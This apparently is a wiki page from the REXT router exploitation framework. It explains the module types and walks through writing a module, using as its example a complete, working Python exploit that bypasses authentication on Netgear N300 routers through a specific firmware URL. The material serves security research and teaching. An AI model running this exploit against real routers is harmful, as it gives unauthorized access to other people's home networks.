Skip to content

Creating module

Jump to bottom Edit New page
Ján Trenčanský edited this page Dec 13, 2015 · 1 revision

Creating module for REXT

In REXT there are so far 5 types of modules you can create

  • decryptors - used for modules that interact with firmware images or config files
  • exploits - modules that exploit a certain vulnerability of embedded device
  • harvesters - modules used to harvest data from device usually after provided valid credentials
  • scanners - modules that scan for certain vulnerability or service discovery
  • misc - anything that doesn't fit in the above, like password generators etc.

Every one of these types has a corresponding super class in core folder from which these modules inherit. These super classes usually contain basic methods that module should contain or can be build upon. You can think of them as templates.

You can create your own type of modules by adding a folder which follows REXT type/vendor/module convention into module folder and by adding super class template into core folder.

I'll show you how to create simple exploit that is actually part of REXT.

# Name:Netgear N300 authentication bypass
# File:n300_auth_bypass.py
# Author:Ján Trenčanský
# License: GNU GPL v3
# Created: 16.11.2015
# Last modified: 16.11.2015
# Shodan Dork:
# Description: Bypasses router authentication on Netgear N300 with firmware N300_1.1.0.31_1.0.1.img
#  or N300-1.1.0.28_1.0.1.img other devices may be vulnerable as well
# Based on: http://www.csnc.ch/misc/files/advisories/CSNC-2015-007_Netgear_WNR1000v4_AuthBypass.txt

import core.Exploit


class Exploit(core.Exploit.RextExploit):
    def __init__(self):
        core.Exploit.RextExploit.__init__(self)

    def do_run(self, e):
        pass

Exploit()

Your new Exploit class inherits from core.Exploit.RextExploit this will take care of things like command prompt initialization, exit command, basic set command for host and port properties with validations in place, commands port and host that will print their values are also provided. Since we are writing exploit for embedded device it's safe to assume we'll need to define host and port. Also it'll create basic help for all commands mentioned above.

As you can see from the snippet above, you define class and then you call it via Exploit(). This is necessary for the script to execute itself and create a command prompt.

run is the command that executes loaded module. For your module to do something you need to override do_run(self, e). Every method that you want to be able to invoke by command has to start with do_ prefix. Check how to use python cmd module for further information if necessary. Exploit can be written entirely in the do_run if they are short, or you can create additional methods and functions.

Now let's add the actual exploit. First let's consider what are we going to need. The exploit uses vulnerability in device frontend so we'll need to import requests. I do not recommend using urllib module. requests module is a REXT dependency and will suffice 99% of things you need and is much more readable.

We'll also want to print status of our exploit into console. For this we'll import print_error, print_success, print_yellow from interface.messages. These functions wrap your string with escape sequences that format your code. For now it may seem a bit unnecessary ordinary print() will do just fine, but in the future logging may be implemented in them.

Colours follow this convention:

  • green - success
  • yellow - warning
  • red - error
  • purple - help
  • blue - information

For this particular exploit time module will also be needed.

# Name:Netgear N300 authentication bypass
# File:n300_auth_bypass.py
# Author:Ján Trenčanský
# License: GNU GPL v3
# Created: 16.11.2015
# Last modified: 16.11.2015
# Shodan Dork:
# Description: Bypasses router authentication on Netgear N300 with firmware N300_1.1.0.31_1.0.1.img
#  or N300-1.1.0.28_1.0.1.img other devices may be vulnerable as well
# Based on: http://www.csnc.ch/misc/files/advisories/CSNC-2015-007_Netgear_WNR1000v4_AuthBypass.txt

import time
import requests

import core.Exploit

from interface.messages import print_error, print_success, print_yellow


class Exploit(core.Exploit.RextExploit):
    def __init__(self):
        core.Exploit.RextExploit.__init__(self)

    def do_run(self, e):
        target = "http://" + self.host + ":" + self.port
        try:
            response = requests.get(target, timeout=60)
            if response.status_code == requests.codes.unauthorized:
                print_yellow("Password protection detected")
                for i in range(0, 3):
                    time.sleep(1)
                    requests.get(target+"/BRS_netgear_success.html", timeout=60)
                response = requests.get(target, timeout=60)
                if response.status_code == requests.codes.ok:
                    print_success("bypass successful. Now use your browser to have at look at the admin interface.")

        except requests.RequestException:
            print_error("timeout!")

Exploit()

The exploit itself if pretty self-explanatory. You can check the original in the link from header.

Add a custom footer
Add a custom sidebar
Clone this wiki locally